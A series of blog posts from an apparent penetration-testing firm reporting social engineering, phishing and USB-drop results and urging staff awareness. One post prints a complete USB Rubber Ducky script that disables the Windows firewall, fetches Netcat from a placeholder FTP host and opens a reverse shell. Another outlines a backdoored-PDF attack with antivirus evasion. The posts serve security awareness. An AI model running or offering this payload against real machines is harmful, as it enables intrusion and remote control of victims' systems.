January 29, 2016

We have just completed a Social Engineering Assessment for one of our U.S. clients. The first one in 2016. The company (a strong well established medium sized business) did a lot of Penetration Testing audits over the years and also a Spear Phishing Test already but they have never undergone a Social Engineering audit.

So they have engaged us asking to pay special attention on whether employees would give out usernames and passwords if social engineered. The results were shocking. Not because users fell for classic social engineering techniques (like claiming to be the IT Dept. or posing as a manager or trusted 3rd party). No it was far worse. Employees were asked by email and in person to give out usernames and passwords in return for something. For the new hires and junior members as $50 Amazon gift voucher did the trick in 7 out of 10 cases.

The classic email phishing was very successful. Claiming to be a manager, people seem to have no problem sending their Active Directory login by email or even via LinkedIn message. Out of 500 phishing emails, more than 400 were successfully answered by employees with username/password pairs.

The best IT Security doesn’t protect anything if employees happily hand it out.

It’s shocking. If we, with the permission of the client get such high results, imagine what a determined competitor or hacking group could do? Security policies are there for a reason. People wouldn’t put their car keys into an envelope and send it to an alleged address of a co-worker? Why people still don’t understand that a username/password is as valuable as the keys to all office buildings?

A lot of training and education is still needed in this field…

Share

December 23, 2015

Some customers think that the USB threat may have gone away after Windows 7 where autoplay/autorun is disabled by default. While this is true for most standard USB attack vectors it doesn’t apply to USB rubber ducky attacks.

What’s the difference?

The USB rubber ducky attack works different in that respect that it doesn’t execute an exe or similar file, but it emulates an external keyboard which is not flagged as malicious activity or as a virus by AV or endpoint protection. It’s like plugging an external keyboard in but rather then a user typing in the commands, the Rubber Ducky executes a set of commands instead.

The following raw code (prior to compiling) simply connects to an FTP server, downloads Netcat and then proceeds to send a shell to a specified IP and port receiver.

DELAY 10000
GUI r
DELAY 200
STRING cmd
ENTER
DELAY 600
STRING cd %USERPROFILE%
ENTER
DELAY 100
STRING netsh firewall set opmode disable
ENTER
DELAY 2000
STRING echo open ftp.something.com 21 > ftp.txt
ENTER
DELAY 100
STRING echo user@something.com>> ftp.txt
ENTER
DELAY 100
STRING echo password>> ftp.txt
ENTER
DELAY 100
STRING echo bin >> ftp.txt
ENTER
DELAY 100
STRING echo get nc.exe >> ftp.txt
ENTER
DELAY 100
STRING echo bye >> ftp.txt
ENTER
DELAY 100
STRING ftp -s:ftp.txt
ENTER
STRING del ftp.txt & exit
ENTER
DELAY 2000
GUI r
DELAY 200
STRING nc -nv X.X.X.X 3333 -e cmd.exe
ENTER
DELAY 2000
GUI r
DELAY 200
STRING cmd
ENTER
DELAY 600
STRING exit
ENTER

We were recently engaged by a fortune 500 company for a Pentest with sound defenses in place, yet their laptops were compromised that way and a lot of juicy information could be harvested. FireEye, McAfee EPO and all the endpoint defenses they had in place couldn’t stop users plugging in a Rubber Ducky. Especially not when the Rubber Ducky is labeled with CEO salaries 2015, free Amazon Vouchers or free expedia vouchers. 8/10 USBs were plugged in and 8/10 shells were received.

The company has security in place and employees get taught to not plug in unknown devices, but hey….curiosity and the opportunity to gain something free beats any security policy….

For folks interested in the USB rubber ducky, here is the link:
http://hakshop.myshopify.com/collections/usb-rubber-ducky/products/usb-rubber-ducky-deluxe?variant=353378649

Share

Social Engineering always wins

Author: Martin Voelk
April 19, 2015

As IT systems become more and more hardened, many script kiddies turn to easier alternative methods – mainly Social Engineering. Social Engineering is exploiting the weaknesses and the human layer, but getting someone to reveal a password over the phone, clicking on a “free voucher PDF” to win something or simply holding the doors open for someone they don’t even know. The possibilities are endless and unfortunately the success rates are 95% – 100%. Kevin Mitnick himself says: There is no cure for stupidity.

We try to educate our customers and employees as best as we can, but in every Penetration Testing engagement we are asked to do by our clients, we have at least 1 success due to social engineering techniques. Whenever people think they can win a $20 dollar voucher or get anything free, they will almost always click a malicious PDF just arrived in their Inbox, not matter how spammy it may look like. People will almost always plug a USB stick in when they receive a free USB from a nice stranger. People will almost always believe that the IT Support is really on the other line of the phone. The list goes on and on.

Here an interesting article from world’s famous Kevin Mitnick:

http://recode.net/2015/03/26/why-kevin-mitnick-the-worlds-most-notorious-hacker-is-still-breaking-into-computers/

 

Share

April 5, 2015

Social Engineering is responsible for most breaches, the human factor remains the weak link.

http://www.azcentral.com/story/money/business/tech/2015/04/03/security-breaches-involve-human-error/70872872/

Share

March 21, 2015

We have been using those in our assessment for quite a while, but we are still impressed how easy it is to compromise complete networks by just someone plugin in this USB stick as part of a social engineering assessment.

Back in the days an executable file was placed on a USB and once plugged into a machine auto-run executed it. Microsoft has since stopped the auto-run on newer OS versions, so you rely on users to click or open a payload, it must be crafted for the exact OS and so on. A pain.

Not with Rubby Ducky. Rubber Ducky recently helped us to compromise a lot of MacBooks at an audit, along with Microsoft Windows 8 machines and Admin Linux desktops. Why is it so easy? Well, because rubber ducky emulates a keyboard rather than executing a program. That means to the machine the ducky is inserted in, it’s like a user typing things, enabling the camera from the CLI, opening a reverse shell. This is what makes it so hard for OS’ to defend themselves against it.

We recently did a social engineering audit at a large insurance company. One of our ladies simple went to the non-restricted coffee break out area at the reception and put out 10 USB sticks with different tags on them such as: GRAB ME – I AM FREE or MANAGEMENT CONFIDENTIAL or LATEST 2015 EMPLOYEE PAYROLL. Guess what? All 10 USBs were taking within 15 minutes and only 2 hours later 8 of the 10 employees who took this “free gift” had inserted it into their machines and opened them up to us via reverse shell.

This once again shows that no defense is of any good, if employees plug in USBs they find in the coffee place. Now this was a large insurance company. Imagine private users in a Starbucks? Scary.

Those things cost around $45 USD each. Imaging a real hacking group purchasing 100 of them for malicious purposes.

We can only warn again and again. Don’t plug any USB sticks into your devices. Especially not ones you don’t know where they came from!

http://usbrubberducky.com

Share

Security issues in Latin America

Author: Martin Voelk
December 11, 2014

We have quite a few government and private industry customers in Latin America. We are used to the fact that Security is by far not as advanced as in the U.S. or Europe, but what we encountered recently in 3 different Latin American countries is scary. We won’t be mentioning the countries specifically as we do not want to provide any further details, but as we have a lot of readers from Latin America, this little post should serve as an eye opener.

Piracy Operating Systems

In many Latin American countries you can simply buy any Operating System such as Windows on a street market and many governments don’t have laws against this or don’t enforce it at all in Latin America. No one should do this but so many individuals and businesses do. The problem is that a lot of those cracked OS versions have built-in backdoors which automatically expose the machine on installation and people don’t realise it.

Windows XP

Despite Microsoft’s end of sale / support / patching of Windows XP, we found XP to be the most widely deployed OS in many Latin American countries. This is a hackers dream. High class remote and client side exploits are available and Microsoft won’t patch any more. Bad enough if private persons still use it, shocking that governments have it in use still.

The USB enforcement

Many of the countries in LATAM now try to move taxation duties online. Nice idea, but where is the security? One example is that business owners in certain countries in Latam have to go to the tax office with their report sheets in electronic format. You can guess where this is going….yes. They expect people to put it on a USB which the Admin ladies then plug into their Windows XP systems. That cries out for a client side exploit with auto-run enabled on Windows XP per default.

There are very few security companies operating in Latin America. IT Security is widely neglected. Everyone understands the need for physical security, CCTV, barbed wire etc. but when it comes to online security even governments fail on basic security. We try to play our partner in Consulting and making at least our customers more secure, but it’s a drop in the ocean, so we hope that if people from Latin America read this article they may take IT Security a bit more seriously.

Share

November 30, 2014

Share

November 30, 2014

Share

November 27, 2014

This is from a real world Pentest conducted for a customer this week. First of all, what is a client side attack? It involves the user to take some action (like browsing to a website or trying to view an excel, powerpoint or PDF document etc.)

The customer tasked us to look for any breach possibility outside the standard server and perimeter Pentesting. Without going into too much technical detail, we were once again shocked how easy it would be for real hackers to breach corporate Security.

We won’t disclosing all tools and methods but just wanna share a high level overview with our readers as an eye opener.

Step 1: After figuring out that Windows 7 runs on employees laptops, we have created a crafted PDF document, backdoored it, disguised it from common Antivirus detection (virustotal.com testing).

Step 2: Captured 10 email addresses from the organisation via some Google search operators

Step 3: Set up a TCP listener on a server on port 443

Step 4: Sent out crafted spoofed emails between employees which enticed them to open the important PDF

Step 5: Once clicked an outbound SSL tunnel from victim to server had been established

Step 6: 8 mails have been sent and 5 machines had been compromised in less than 1 hour

Step 7: After the sessions were migrated to a persistent Windows system process, privilege escalation to Admin was not a challenge

Whilst we have spent 10 days on Pentesting our customers server farms to be successful of eventually finding a vulnerability, the client site attack took all in less than 2.5 hours.

Don’t think your IT is protected by even running the latest and well know Anti Virus software.

What could have prevented this? SSL inspection of outbound traffic and Deep packet inspection of Emails and attachments (Hopefully) but even some IPS systems we tested are prone to source code change of malicious payload and give no full guarantee of detection unless anomaly based detection is being used.

Share

November 27, 2014

Companies these days realise the need for Firewall and IPS so hackers more and more turn their attention elsewhere – the human. In all social engineering attacks we have performed this year alone, we have a staggering success rate of 98%. In other words, in 98% of the cases users entered their credentials into a portal which they believed was the portal they were trying to login to.

Almost every user happily associates to an Access Point which broadcasts their company name out and happily becomes a man-in-the-middle victim including SSL stripping. 8 out of 10 users plug any USB stick into their private laptops or company laptops if it’s labeled “confidential”. 9 out of 10 users open PDFs and Excels with malicious payloads if they think a friend or the boss sent them. If company security kicks in, still 4 out of 10 email the PDF to their private Yahoo or Gmail account.

If users are being asked, Java needs to run on the browser – do you accept? They click yes and thereby create a tunnel back to the attacker. Spoofed phone numbers, SMS and Emails are usually only the first step to complete data exposure. Almost all employees accept the CEO or Board member on Linkedin (Wow the CEO just added me). No one even thinks that the “CEO” could be a fake profile from a hacker. Building trust with employees, asking for confidential information and getting this information within 5 days is common place.

We have been conducting Security Audits for customers for years, but even our team gets surprised again and again on how easy it is to obtain information from employees and the best Firewall can’t do anything against it. Have a think about where you click, who you answer to! It may not always be the person you think!

We have created a Cyber Security Awareness Training for ordinary non-technical IT Users.

http://www.pentestcoach.com/it-security-user-awareness-training/

Share